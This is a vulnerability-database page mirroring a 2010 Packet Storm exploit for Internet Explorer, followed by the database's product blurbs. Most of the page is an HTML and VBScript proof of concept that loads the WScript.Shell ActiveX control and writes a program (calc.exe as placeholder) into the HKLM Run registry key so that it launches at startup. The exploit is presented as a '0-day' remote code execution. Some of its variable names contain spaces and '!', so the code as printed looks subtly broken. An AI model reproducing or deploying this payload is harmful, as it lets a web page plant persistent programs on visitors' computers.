Lucene search
K

Internet Explorer wshom.ocx Active-X Insecure Method

🗓️ 17 Jan 2010 00:00:00Reported by D3V!L FucK3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Internet Explorer Active-X Insecure Method Exploi

Code
`==============================================================================  
_ _ _ _ _ _  
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
#Exploit title:0-day Interner Explorer ActiveX remote code Execution 2 (insecure method)  
#version: all versions  
#Author: [D3V!L FUCKER & germaya_x]  
#special thanx: [for my best friend his0k4].  
#Geetz [2] :[Sarbot511 ,thrid-devil ,ahwak2000].  
#tested on : windows 7 , windows vista ,windows xp sp2  
#n0te:you can use it by run it then restart the computer once it open you will show the calc.exe  
==============================================================================  
<html>  
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>  
<script language='vbscript'>  
  
targetFile = "c:\WINDOWS\system32\wshom.ocx"  
prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )"  
memberName = "RegWrite"  
progid = "IWshRuntimeLibrary.IWshShell_Class"  
argCount = 3  
  
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"  
germaya_x="C:\WINDOWS\system32\calc.exe"  
his0k4="REG_SZ"  
  
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4  
  
</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation